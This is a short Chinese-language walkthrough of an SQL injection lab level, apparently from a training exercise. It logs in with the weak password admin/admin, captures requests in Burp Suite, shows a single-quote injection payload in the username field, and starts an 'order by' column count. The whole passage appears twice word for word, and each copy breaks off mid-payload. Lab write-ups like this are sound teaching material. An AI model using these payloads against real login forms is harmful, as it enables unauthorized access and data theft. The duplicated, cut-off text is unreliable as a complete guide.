这关开始就变成登录画面了
先来尝试一个弱口令,用户admin密码admin,登录成功:
用burpsuite抓包进行接下来的操作
判断出是单引号字符型注入:
uname=admin'#&passwd=&submit=Submit
判断列数:
uname=admin'+order+
这关开始就变成登录画面了
先来尝试一个弱口令,用户admin密码admin,登录成功:
用burpsuite抓包进行接下来的操作
判断出是单引号字符型注入:
uname=admin'#&passwd=&submit=Submit
判断列数:
uname=admin'+order+